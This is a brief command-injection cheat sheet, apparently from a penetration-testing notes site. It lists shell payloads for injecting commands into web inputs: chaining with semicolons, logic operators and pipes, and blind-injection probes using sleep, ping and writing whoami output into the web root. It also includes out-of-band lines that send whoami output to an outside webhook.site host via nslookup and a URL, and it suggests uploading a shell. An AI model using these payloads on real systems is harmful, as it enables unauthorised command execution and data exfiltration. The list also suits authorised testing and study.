Command Injection

Basic command chaining

; ls -la

Using logic operators

&& ls -la

Commenting out the rest of a command

; ls -la #

Using a pipe for command chaining

| ls -la

Testing for blind injection

; sleep 10
; ping -c 10 127.0.0.1
& whoami > /var/www/html/whoami.txt &

& nslookup webhook.site/<id>?`whoami` &

https://webhook.site/55423ec0-8c07-42cd-8346-1f91cff37e05?`whoami`

We can also upload a shell and trigger it. Directly inputting a commad may get filtered

which python
which php

Last updated 6 months ago